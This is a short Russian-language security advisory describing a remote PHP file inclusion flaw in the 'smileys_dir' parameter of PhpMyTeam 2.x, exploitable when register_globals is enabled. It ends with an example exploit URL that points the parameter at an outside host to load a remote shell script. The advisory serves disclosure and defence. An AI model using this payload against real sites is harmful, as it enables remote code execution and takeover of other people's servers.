Программа: PhpMyTeam 2.x
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре "smileys_dir" сценарием images/smileys/smileys_packs.php.
Успешное эксплуатирование уязвимости требует включение опции "register_globals".
Пример:
/images/smileys/smileys_packs.php?smileys_dir=http://sh3LL?
